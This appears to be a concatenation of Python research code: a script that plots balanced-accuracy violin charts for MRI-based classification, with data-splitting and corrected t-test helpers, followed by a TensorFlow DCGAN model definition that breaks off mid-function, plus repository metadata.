for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path, task + '_VB_' + tissue + '_0.3_8', 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_md_voxel.append(balanced_accuracy)
## get FA balanced
for task in tasks_balanced:
for tissue in tissue_combinations:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_VB_' + tissue + '_0.3_8', 'fa')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_fa_voxel.append(balanced_accuracy)
## get MD balanced
for task in tasks_balanced:
for tissue in tissue_combinations:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_VB_' + tissue + '_0.3_8', 'md')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_md_voxel.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_acc_fa_voxel).transpose()
metric = metric[:, [0, 3, 1, 4, 2, 5]]
## define the violin's postions
# pos = [1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15]
pos = [1, 2, 4, 5, 7, 8]
# color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue and green
legend = ['GM+WM_raw', 'GM+WM_balanced']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([1.5, 4.5, 7.5])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: FA Voxel-based classifications', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_acc_md_voxel).transpose()
metric = metric[:, [0, 3, 1, 4, 2, 5]]
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: MD Voxel-based classifications', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'figure3_AB.png'), additional_artists=plt.legend,
bbox_inches="tight")
print 'finish Figure 3'
elif figure_number == 4:
results_balanced_acc_voxel_imbalanced = []
results_balanced_acc_regional_imbalanced = []
tissue_combinations = ['GM_WM']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
if raw_classification == True:
print "Plot for original classification, to compare T1 with DWI, we use GM+WM"
## T1
for task in tasks_imbalanced:
tsvs_path = os.path.join(classification_result_path, task + '_VB_T1_fwhm_8')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
## GM+WM FA
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path,
task + '_VB_' + tissue + '_0.3_8', 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
## GM+WM MD
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path,
task + '_VB_' + tissue + '_0.3_8', 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_voxel_imbalanced).transpose()
## reorder the order of the column to make sure the right order in the image
metric_new = metric[:, [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]]
## define the violin's postions
pos = [1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15]
color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
legend = ['GM-T1w', 'GM+WM-FA', 'GM+WM-MD']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric_new, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([2, 6, 10, 14])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric_new, 0)
std = np.std(metric_new, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: Voxel-based classifications for T1w and diffusion MRI', fontsize=15)
### T1 atlaes
atlases_T1 = ['AAL2']
for task in tasks_imbalanced:
for atlas in atlases_T1:
tsvs_path = os.path.join(classification_result_path, task + '_RB_T1_' + atlas)
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
atlases_DTI = ['JHUDTI81']
## get DTI atlases FA
for task in tasks_imbalanced:
for atlas in atlases_DTI:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
#
# ## get DTI atlases MD
# for task in tasks_imbalanced:
# for atlas in atlases_DTI:
# tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'md')
# balanced_accuracy = []
# for i in xrange(n_iterations):
# result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
# if os.path.isfile(result_tsv):
# balanced_accuracy.append(
# (pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
# else:
# raise OSError(
# errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
# results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_regional_imbalanced).transpose()
## reorder the order of the column to make sure the right order in the image
metric_new = metric[:, [0, 4, 1, 5, 2, 6, 3, 7]]
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8, 10, 11]
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue and green
legend = ['AAL2-T1w', 'JHULabel-FA']
## define the size of th image
line_coll = ax[1].violinplot(metric_new, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric_new, 0)
std = np.std(metric_new, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: Region-based classifications for T1w and diffusion MRI', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'violin_T1_compare_dwi.png'), additional_artists=plt.legend,
bbox_inches="tight")
#
print 'finish T1'
def random_donsample_subjects(diagnoses_tsv, n=None):
"""
This function is to randomly downsample the subjects.
:param diagnoses_tsv:
:return:
"""
from collections import Counter
import os
diagnoses = pd.io.parsers.read_csv(diagnoses_tsv, sep='\t')
print 'Do random subsampling the majority group to number of subjects of minority group:'
counts = Counter(list(diagnoses.diagnosis))
label1 = counts.keys()[0]
label2 = counts.keys()[1]
count_label1 = counts[label1]
count_label2 = counts[label2]
if count_label1 < count_label2:
print '%s is the majority group and will be randomly downsampled.' % label2
majority_df_index = diagnoses.index[diagnoses['diagnosis'] == label2]
drop_index = np.random.choice(majority_df_index, count_label2 - count_label1, replace= False)
diagnoses_balanced = diagnoses.drop(drop_index)
elif count_label1 > count_label2:
print '%s is the majority group and will be randomly downsampled.' % label1
majority_df_index = diagnoses.index[diagnoses['diagnosis'] == label1]
drop_index = np.random.choice(majority_df_index, count_label1 - count_label2, replace= False)
diagnoses_balanced = diagnoses.drop(drop_index)
else:
raise Exception("""The data is balanced already, please deactivate the balanced_down_sample flag""")
# save the balanced tsv
if n == None:
if os.path.isfile(os.path.join(os.path.dirname(diagnoses_tsv), os.path.basename(diagnoses_tsv).split('.')[0] + '_balanced.tsv')):
pass
else:
diagnoses_balanced.to_csv(os.path.join(os.path.dirname(diagnoses_tsv), os.path.basename(diagnoses_tsv).split('.')[0] + '_balanced.tsv'), sep='\t', index=False)
else:
if os.path.isfile(os.path.join(os.path.dirname(diagnoses_tsv), os.path.basename(diagnoses_tsv).split('.')[0] + '_' + str(n) + '_balanced.tsv')):
pass
else:
diagnoses_balanced.to_csv(os.path.join(os.path.dirname(diagnoses_tsv), os.path.basename(diagnoses_tsv).split('.')[0] + '_' + str(n) + '_balanced.tsv'), sep='\t', index=False)
list_diagnoses = list(diagnoses_balanced.diagnosis)
list_subjects = list(diagnoses_balanced.participant_id)
list_sessions = list(diagnoses_balanced.session_id)
return list_subjects, list_sessions, list_diagnoses
def split_subjects_to_pickle(diagnoses_tsv, n_iterations=250, test_size=0.2, balanced = False):
from os import path
import pandas as pd
import numpy as np
from sklearn.model_selection import StratifiedShuffleSplit
import pickle
from collections import Counter
diagnoses = pd.io.parsers.read_csv(diagnoses_tsv, sep='\t')
if 'diagnosis' not in list(diagnoses.columns.values):
raise Exception('Diagnoses file is not in the correct format.')
diagnoses_list = list(diagnoses.diagnosis)
unique = list(set(diagnoses_list))
y = np.array([unique.index(x) for x in diagnoses_list])
if balanced == False:
splits_indices_pickle = path.join(path.dirname(diagnoses_tsv), path.basename(diagnoses_tsv).split('.')[0] + '.pkl')
else:
splits_indices_pickle = path.join(path.dirname(diagnoses_tsv), path.basename(diagnoses_tsv).split('.')[0] + '_balanced.pkl')
## try to see if the shuffle has been done
if os.path.isfile(splits_indices_pickle):
splits_indices = pickle.load(open(splits_indices_pickle, 'rb'))
else:
splits = StratifiedShuffleSplit(n_splits=n_iterations, test_size=test_size)
if balanced == False:
splits_indices = list(splits.split(np.zeros(len(y)), y))
else:
print 'Do random subsampling the majority group to number of subjects of minority group:'
splits_indices = []
n_iteration = 0
for train_index, test_index in splits.split(np.zeros(len(y)), y):
# for training
train_label1 = []
train_label2 = []
counts = Counter(diagnoses.diagnosis[train_index])
label1 = counts.keys()[0]
label2 = counts.keys()[1]
count_label1 = counts[label1]
count_label2 = counts[label2]
for i in train_index:
if diagnoses.diagnosis[i] == label2:
train_label2.append(i)
else:
train_label1.append(i)
if count_label1 < count_label2:
print 'In training data for iteration %d, %s is the majority group and will be randomly downsampled.' % (n_iteration, label2)
drop_index_train = np.random.choice(train_label2, count_label2 - count_label1, replace=False)
train_index_balanced = np.asarray([item for item in train_index if item not in drop_index_train])
elif count_label1 > count_label2:
print 'In training data for iteration %d, %s is the majority group and will be randomly downsampled.' % (n_iteration, label1)
drop_index_train = np.random.choice(train_label1, count_label1 - count_label2, replace=False)
train_index_balanced = np.asarray([item for item in train_index if item not in drop_index_train])
else:
raise Exception("""The data is balanced already, please deactivate the balanced_down_sample flag""")
# for test
test_label1 = []
test_label2 = []
counts = Counter(diagnoses.diagnosis[test_index])
label1 = counts.keys()[0]
label2 = counts.keys()[1]
count_label1 = counts[label1]
count_label2 = counts[label2]
for i in test_index:
if diagnoses.diagnosis[i] == label2:
test_label2.append(i)
else:
test_label1.append(i)
if count_label1 < count_label2:
print 'In test data for iteration %d, %s is the majority group and will be randomly downsampled.' % (n_iteration, label2)
drop_index_test= np.random.choice(test_label2, count_label2 - count_label1, replace=False)
test_index_balanced = np.asarray([item for item in test_index if item not in drop_index_test])
elif count_label1 > count_label2:
print 'In test data for iteration %d, %s is the majority group and will be randomly downsampled.' % (n_iteration, label1)
drop_index_test = np.random.choice(test_label1, count_label1 - count_label2, replace=False)
test_index_balanced = np.asarray([item for item in test_index if item not in drop_index_test])
else:
raise Exception("""The data is balanced already, please deactivate the balanced_down_sample flag""")
##
n_iteration += 1
splits_indices.append((train_index_balanced, test_index_balanced))
## save each iteration as tsv files
diagnoses_balanced_tsv = diagnoses.drop(np.append(drop_index_train, drop_index_test))
diagnoses_balanced_tsv.to_csv(os.path.join(os.path.dirname(diagnoses_tsv),
os.path.basename(diagnoses_tsv).split('.')[0] + '_' + str(
n_iteration) + '_balanced.tsv'), sep='\t', index=False)
with open(splits_indices_pickle, 'wb') as s:
pickle.dump(splits_indices, s)
return splits_indices, splits_indices_pickle
def compute_t(subjects_1_tsv, subjects_2_tsv, test_size=0.2):
"""
This is a function to compute the corrected resampled paired t-test based on the paper of Nadeau and Bengio 2003.
Also please refer this post to understand the different metrics used to compare two classifiers (https://stats.stackexchange.com/questions/217466/for-model-selection-comparison-what-kind-of-test-should-i-use)
Also, please refer the package mlxtend.evaluate, but they did not include the corrected resampled paired t-test
:param subjects_1_tsv:
:param subjects_2_tsv:
:param test_size:
:return:
"""
subjects_1 = pd.io.parsers.read_csv(subjects_1_tsv, sep='\t')
subjects_2 = pd.io.parsers.read_csv(subjects_2_tsv, sep='\t')
num_split = len(subjects_1.iteration.unique())
n_subj = subjects_1.shape[0] / num_split
test_error_split = np.zeros((num_split, 1)) # this list will contain the list of mu_j hat for j = 1 to J
q1 = (subjects_1.y == subjects_1.y_hat) * 1.0
q2 = (subjects_2.y == subjects_2.y_hat) * 1.0
l = q1 - q2
for i in range(num_split):
test_error_split[i] = np.mean(l[(i * n_subj):((i + 1) * n_subj)])
# compute mu_{n_1}^{n_2}
average_test_error = np.mean(test_error_split)
# compute S2_{mu_J}
approx_variance = np.sum((test_error_split - average_test_error) ** 2)
resampled_t = average_test_error * np.sqrt(num_split) / np.sqrt(approx_variance / (num_split - 1))
resampled_p_value = stats.t.sf(np.abs(resampled_t), num_split - 1) * 2.
corrected_resampled_t = average_test_error * np.sqrt(num_split) / np.sqrt((test_size / (1 - test_size) + 1/(num_split - 1)) * approx_variance)
corrected_resampled_p_value = stats.t.sf(np.abs(corrected_resampled_t), num_split - 1) * 2.
return resampled_t, resampled_p_value, corrected_resampled_t, corrected_resampled_p_value
| 57.95706
| 212
| 0.537955
| 9,513
| 79,633
| 4.322086
| 0.04867
| 0.046308
| 0.015809
| 0.029186
| 0.905098
| 0.895734
| 0.885227
| 0.876277
| 0.870294
| 0.867862
| 0
| 0.033055
| 0.351136
| 79,633
| 1,373
| 213
| 57.999272
| 0.762672
| 0.070561
| 0
| 0.846154
| 0
| 0
| 0.082009
| 0.002221
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.004869
| 0.0185
| null | null | 0.04187
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2f7e2752c1da36063e3bbfe4a1e108d57793d3d
| 20,992
|
py
|
Python
|
Model/DCGAN.py
|
Wenyuan-Vincent-Li/DCGAN
|
a3a7b6eebefe98a8cab3c4512041f116e0a90b5b
|
[
"MIT"
] | 1
|
2019-01-28T00:10:45.000Z
|
2019-01-28T00:10:45.000Z
|
Model/DCGAN.py
|
Wenyuan-Vincent-Li/DCGAN
|
a3a7b6eebefe98a8cab3c4512041f116e0a90b5b
|
[
"MIT"
] | null | null | null |
Model/DCGAN.py
|
Wenyuan-Vincent-Li/DCGAN
|
a3a7b6eebefe98a8cab3c4512041f116e0a90b5b
|
[
"MIT"
] | null | null | null |
import sys, os
if os.getcwd().endswith("DCGAN"):
root_dir = os.getcwd()
else:
root_dir = os.path.dirname(os.getcwd())
sys.path.append(root_dir)
import tensorflow as tf
from Model import model_base
class DCGAN(model_base.GAN_Base):
def __init__(self, config):
super(DCGAN, self).__init__(config.DATA_FORMAT, \
config.BATCH_NORM_DECAY, config.BATCH_NORM_EPSILON)
self.config = config
def mrGAN_encoder(self, image, reuse = False):
with tf.variable_scope("encoder") as scope:
if reuse:
scope.reuse_variables()
if self.config.CHANNEL == 3:
h0 = self._conv2d(image, 64, name = 'e_h0_conv')
h0 = tf.nn.leaky_relu(h0)
h1 = self._conv2d(h0, 64 * 2, name = 'e_h1_conv')
h1 = self._batch_norm_contrib(h1, name = 'd_h1_bn', train = True)
h1 = tf.nn.leaky_relu(h1)
h2 = self._conv2d(h1, 64 * 4, name = 'e_h2_conv')
h2 = self._batch_norm_contrib(h2, name = 'd_h2_bn', train = True)
h2 = tf.nn.leaky_relu(h2)
h3 = self._conv2d(h2, 64 * 8, name = 'e_h3_conv')
h3 = self._batch_norm_contrib(h3, name = 'e_h3_bn', train = True)
h3 = tf.nn.leaky_relu(h3)
h4 = tf.reshape(h3, [self.config.BATCH_SIZE, -1])
h4 = self._linear_fc(h4, 100, 'e_h4_lin')
return tf.tanh(h4)
else:
# first conv
h0 = self._conv2d(image, 1 + self.config.NUM_CLASSES, name = 'e_h0_conv')
h0 = tf.nn.leaky_relu(h0, alpha = 0.2, name = 'e_leaky0')
# second conv
h1 = self._conv2d(h0, 64 + self.config.NUM_CLASSES, name = 'e_h1_conv')
h1 = self._batch_norm_contrib(h1, name = 'e_h1_bn', train = True)
h1 = tf.nn.leaky_relu(h1, alpha = 0.2, name = 'e_leaky1')
# reshape and concat the label
h1 = tf.reshape(h1, [self.config.BATCH_SIZE, -1])
## fc layer
h2 = self._linear_fc(h1, 1024, 'e_h2_lin')
h2 = self._batch_norm_contrib(h2, name = 'e_h2_bn', train = True)
h2= tf.nn.leaky_relu(h2, alpha = 0.2, name = 'e_leaky2')
h3 = self._linear_fc(h2, 100, 'e_h3_lin')
return h3
def generator(self, z, y = None, reuse = False):
with tf.variable_scope("generator") as scope:
if reuse:
scope.reuse_variables()
if not self.config.Y_LABEL: ## there is no y, don't use conditional GAN
if self.config.CHANNEL == 1:
## first linear layer
h0 = self._linear_fc(z, 1024, 'g_h0_lin')
h0 = self._batch_norm_contrib(h0, 'g_bn0', train=True)
h0 = tf.nn.relu(h0, 'g_rl0')
## second linear layer
h1 = self._linear_fc(h0, self.config.BATCH_SIZE * 2 * 7 * 7, 'g_h1_lin')
h1 = self._batch_norm_contrib(h1, 'g_bn1', train=True)
h1 = tf.nn.relu(h1, 'g_rl1')
## reshape to conv feature pack and concat with label condition
h1 = tf.reshape(h1, [self.config.BATCH_SIZE, 7, 7, 64 * 2])
## first layer deconv
h2 = self._deconv2d(h1, 128, name='g_dconv0')
h2 = self._batch_norm_contrib(h2, 'g_bn2', train=True)
h2 = tf.nn.relu(h2, 'g_rl2')
## output layer: sigmoid to map the data range to [0, 1]
h3 = self._deconv2d(h2, 1, name='g_dconv1')
h3 = tf.nn.sigmoid(h3, name='sigmoid')
return h3
else:
# project 'z' and reshape
z = self._linear_fc(z, 64 * 8 * 4 * 4, 'g_h0_lin')
h0 = tf.reshape(z, [-1, 4, 4, 64 * 8])
h0 = self._batch_norm_contrib(h0, 'g_bn0', train = True)
h0 = tf.nn.relu(h0, 'g_rl0') ## [4, 4]
h1 = self._deconv2d(h0, 64 * 4, name = 'g_dconv0')
h1 = self._batch_norm_contrib(h1, 'g_bn1', train = True)
h1 = tf.nn.relu(h1, 'g_rl1') ## [8, 8]
h2 = self._deconv2d(h1, 64 * 2, name = 'g_dconv1')
h2 = self._batch_norm_contrib(h2, 'g_bn2', train = True)
h2 = tf.nn.relu(h2, 'g_rl2') ## [16, 16]
h3 = self._deconv2d(h2, 64 * 1, name = 'g_dconv2')
h3 = self._batch_norm_contrib(h3, 'g_bn3', train = True)
h3 = tf.nn.relu(h3, 'g_rl3') ## [32, 32]
h4 = self._deconv2d(h3, self.config.CHANNEL, name = 'g_dconv3')
h4 = tf.nn.tanh(h4)
## [64, 64]
return h4
else: ## use conditional GAN
if self.config.DATA_NAME == "mnist":
yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES]) ## [None, 1, 1, 10]
z = tf.concat([z, y], 1) # concat the z and y in the latent space
## first linear layer
h0 = self._linear_fc(z, 1024, 'g_h0_lin')
h0 = self._batch_norm_contrib(h0, 'g_bn0', train = True)
h0 = tf.nn.relu(h0, 'g_rl0')
h0 = tf.concat([h0, y], 1)
## second linear layer
h1 = self._linear_fc(h0, self.config.BATCH_SIZE * 2 * 7 * 7, 'g_h1_lin')
h1 = self._batch_norm_contrib(h1, 'g_bn1', train = True)
h1 = tf.nn.relu(h1, 'g_rl1')
## reshape to conv feature pack and concat with label condition
h1 = tf.reshape(h1, [self.config.BATCH_SIZE, 7, 7, 64 * 2])
h1 = self._conv_cond_concat(h1, yb)
## first layer deconv
h2 = self._deconv2d(h1, 128, name = 'g_dconv0')
h2 = self._batch_norm_contrib(h2, 'g_bn2', train = True)
h2 = tf.nn.relu(h2, 'g_rl2')
h2 = self._conv_cond_concat(h2, yb)
## output layer: sigmoid to map the data range to [0, 1]
h3 = self._deconv2d(h2, 1, name = 'g_dconv1')
h3 = tf.nn.sigmoid(h3, name = 'sigmoid')
return h3
elif self.config.DATA_NAME == "prostate":
# project 'z' and reshape
yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES])
z = tf.concat([z, y], 1)
z = self._linear_fc(z, 64 * 8 * 4 * 4, 'g_h0_lin')
h0 = tf.reshape(z, [-1, 4, 4, 64 * 8])
h0 = self._batch_norm_contrib(h0, 'g_bn0', train=True)
h0 = tf.nn.relu(h0, 'g_rl0') ## [4, 4]
h0 = self._conv_cond_concat(h0, yb)
h1 = self._deconv2d(h0, 64 * 4, name='g_dconv0')
h1 = self._batch_norm_contrib(h1, 'g_bn1', train=True)
h1 = tf.nn.relu(h1, 'g_rl1') ## [8, 8]
h1 = self._conv_cond_concat(h1, yb)
h2 = self._deconv2d(h1, 64 * 2, name='g_dconv1')
h2 = self._batch_norm_contrib(h2, 'g_bn2', train=True)
h2 = tf.nn.relu(h2, 'g_rl2') ## [16, 16]
h2 = self._conv_cond_concat(h2, yb)
h3 = self._deconv2d(h2, 64 * 1, name='g_dconv2')
h3 = self._batch_norm_contrib(h3, 'g_bn3', train=True)
h3 = tf.nn.relu(h3, 'g_rl3') ## [32, 32]
h3 = self._conv_cond_concat(h3, yb)
h4 = self._deconv2d(h3, 3, name='g_dconv3')
h4 = tf.nn.tanh(h4)
## [64, 64]
return h4
def discriminator(self, image, y = None, reuse = False):
with tf.variable_scope("discriminator") as scope:
if reuse:
scope.reuse_variables()
if not self.config.Y_LABEL:
if self.config.CHANNEL == 3:
image = self._add_noise(image)
h0 = self._conv2d(image, 64, name = 'd_h0_conv')
h0 = tf.nn.leaky_relu(h0)
h1 = self._conv2d(h0, 64 * 2, name = 'd_h1_conv')
h1 = self._batch_norm_contrib(h1, name = 'd_h1_bn', train = True)
h1 = tf.nn.leaky_relu(h1)
h2 = self._conv2d(h1, 64 * 4, name = 'd_h2_conv')
h2 = self._batch_norm_contrib(h2, name = 'd_h2_bn', train = True)
h2 = tf.nn.leaky_relu(h2)
h3 = self._conv2d(h2, 64 * 8, name = 'd_h3_conv')
h3 = self._batch_norm_contrib(h3, name = 'd_h3_bn', train = True)
h3 = tf.nn.leaky_relu(h3)
fm = h3
h4 = tf.reshape(h3, [self.config.BATCH_SIZE, -1])
if self.config.MINIBATCH_DIS:
f = self._minibatch_discrimination(h4, 100)
h4 = tf.concat([h4, f], 1)
h4 = self._linear_fc(h4, 1, 'd_h4_lin')
return tf.nn.sigmoid(h4), h4, fm
else:
image = self._add_noise(image)
# first conv
h0 = self._conv2d(image, 1 + self.config.NUM_CLASSES, name='d_h0_conv')
h0 = tf.nn.leaky_relu(h0, alpha=0.2, name='d_leaky0')
# second conv
h1 = self._conv2d(h0, 64 + self.config.NUM_CLASSES, name='d_h1_conv')
h1 = self._batch_norm_contrib(h1, name='d_h1_bn', train=True)
h1 = tf.nn.leaky_relu(h1, alpha=0.2, name='d_leaky1')
fm = h1
# reshape and concat the label
h1 = tf.reshape(h1, [self.config.BATCH_SIZE, -1])
## fc layer
h2 = self._linear_fc(h1, 1024, 'd_h2_lin')
h2 = self._batch_norm_contrib(h2, name='d_h2_bn', train=True)
h2 = tf.nn.leaky_relu(h2, alpha=0.2, name='d_leaky2')
if self.config.MINIBATCH_DIS:
f = self._minibatch_discrimination(h2, 100)
h2 = tf.concat([h2, f], 1)
h3 = self._linear_fc(h2, 1, 'd_h3_lin')
return tf.nn.sigmoid(h3), h3, fm
else:
